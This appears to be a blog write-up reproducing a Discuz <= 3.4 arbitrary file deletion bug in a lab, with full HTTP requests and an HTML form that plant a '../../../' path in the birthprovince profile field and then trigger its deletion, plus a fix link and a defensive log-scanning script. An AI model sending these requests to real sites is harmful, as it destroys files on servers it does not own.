Preface: On September 29, Discuz fixed a front-end arbitrary file deletion vulnerability. A similar vulnerability was submitted to wooyun and to Discuz officially back in 2014, but the incomplete fix led to this one. Many sources online say the official 3.4 version has already fixed it, but the environment I am using is the 3.4 version from vulhub, so without knowing whether 3.4 is fixed or not, I simply reproduce it directly.
Affected versions: Discuz <= 3.4
Environment
Reproduction steps: first create a test.txt file in the discuz directory; this is the file that will be deleted later.
[Figure: creating test.txt]
Visit http://192.168.220.131/home.php?mod=spacecp, then open the element inspector, find the value of formhash and copy it.
[Figure: viewing formhash]
Use Burp to capture the request and obtain the cookie.
[Figure: capturing the cookie]
Send the following packet, replacing the cookie, the formhash, and the file to be deleted:
POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1
Host: localhost
Content-Length: 367
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryPFvXyxL45f34L12s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Connection: close

------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="formhash"

84a7f376
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="birthprovince"

../../../test.txt
------WebKitFormBoundaryPFvXyxL45f34L12s
Content-Disposition: form-data; name="profilesubmit"

1
------WebKitFormBoundaryPFvXyxL45f34L12s--
[Figure: sending the packet that stores the path to delete]
Refresh the page; the birthplace field now shows the state in the figure below:
[Figure: data written successfully]
This shows the value has been stored in the database.
Next, create an upload.html with the following code. Change the IP to the domain of your Discuz instance and [form-hash] to your own formhash:
<form action="http://192.168.220.131/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">
<input type="file" name="birthprovince" id="file" />
<input type="text" name="formhash" value="84a7f376" />
<input type="text" name="profilesubmit" value="1" />
<input type="submit" value="Submit" />
</form>
Or construct the packet directly:
POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1
Host: 192.168.220.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------123821742118716
Content-Length: 91989
Connection: close
Cookie: CmcL_2132_saltkey=b9yKqToA; CmcL_2132_lastvisit=1577934646; CmcL_2132_sid=I21Fam; CmcL_2132_lastact=1577951222%09misc.php%09patch; CmcL_2132__refer=%252Fhome.php%253Fmod%253Dspacecp; CmcL_2132_seccode=1.1f5dbc9f8f51267031; CmcL_2132_ulastactivity=f7c74D32skNeZM0YcFOOaQUi7XmBcai6jjji8MGC7px2%2BTiSN9qM; CmcL_2132_auth=8bf5qD72m1LL4vx%2BXQAGHjNEfio4ELQqrhkkrwz%2FdcuiSxXlRhnYfpwxloZj5lqVp6zUrThf%2FVYOcWS9xQwm; CmcL_2132_lastcheckfeed=2%7C1577938266; CmcL_2132_lip=192.168.220.1%2C1577938056
Upgrade-Insecure-Requests: 1

-----------------------------123821742118716
Content-Disposition: form-data; name="birthprovince"; filename="0.jpg"
Content-Type: image/jpeg

zerba (anything can be written here)
-----------------------------123821742118716--
Go back into the discuz directory and you can see that test.txt has been deleted.
[Figure: test.txt no longer present]
Fix recommendation: https://gitee.com/ComsenzDiscuz/DiscuzX/commit/7d603a197c2717ef1d7e9ba654cf72aa42d3e574
Edit the file upload/source/include/spacecp/spacecp_profile.php and remove the code related to unlink.
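A defender-side check added here (example code, not part of the original post and not Discuz's own code): it scans constructed access-log lines for the two request shapes shown above and audits stored profile text values for path syntax. The combined log format, the sample lines, and the weaker heuristic that profilesubmit and formhash normally travel in the form body are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample lines in combined access-log format (not taken from the original post).
SAMPLE_LOG = """\
192.168.220.1 - - [02/Jan/2020:10:01:12 +0800] "GET /home.php?mod=spacecp HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.220.1 - - [02/Jan/2020:10:02:03 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base HTTP/1.1" 200 812 "-" "Mozilla/5.0"
192.168.220.1 - - [02/Jan/2020:10:03:41 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&deletefile%5Bbirthprovince%5D=aaaaaa HTTP/1.1" 200 90 "-" "Mozilla/5.0"
192.168.220.1 - - [02/Jan/2020:10:03:45 +0800] "POST /home.php?mod=spacecp&ac=profile&op=base&profilesubmit=1&formhash=84a7f376 HTTP/1.1" 200 90 "-" "Mozilla/5.0"
"""

# Only the method and request target matter; the rest of the combined format is ignored.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def classify_request(method, target):
    """Return indicator tags for one spacecp profile request, or [] if nothing stands out."""
    parts = urlsplit(target)
    values = dict(parse_qsl(parts.query, keep_blank_values=True))
    if not parts.path.endswith("/home.php") or values.get("mod") != "spacecp" \
            or values.get("ac") != "profile":
        return []
    found = []
    # Strong indicator: a deletefile[<field>] key on the profile action. Legitimate profile
    # image removals also carry it, so the tag names the field for review.
    for key in sorted(values):
        if key.startswith("deletefile[") and key.endswith("]"):
            found.append("deletefile:" + key[len("deletefile["):-1])
    # Weaker indicator: profilesubmit and formhash in the query string of a POST rather than
    # in the form body (assumption: the regular profile form submits them in the body).
    if method == "POST" and "profilesubmit" in values and "formhash" in values:
        found.append("submit-in-query")
    return found

def has_traversal(value):
    """True if a stored profile text value carries path syntax a province name never needs."""
    return any(tok in value for tok in ("..", "/", "\\", "\x00"))

def scan_log(text):
    """Return (line number, indicators) for every flagged request in an access log."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.search(line)
        if m and (indicators := classify_request(m["method"], m["target"])):
            hits.append((lineno, indicators))
    return hits
```

The first packet's traversal string lives in the POST body and never reaches an access log, so has_traversal is meant to be run over the birthprovince column of the profile table, where that value is stored.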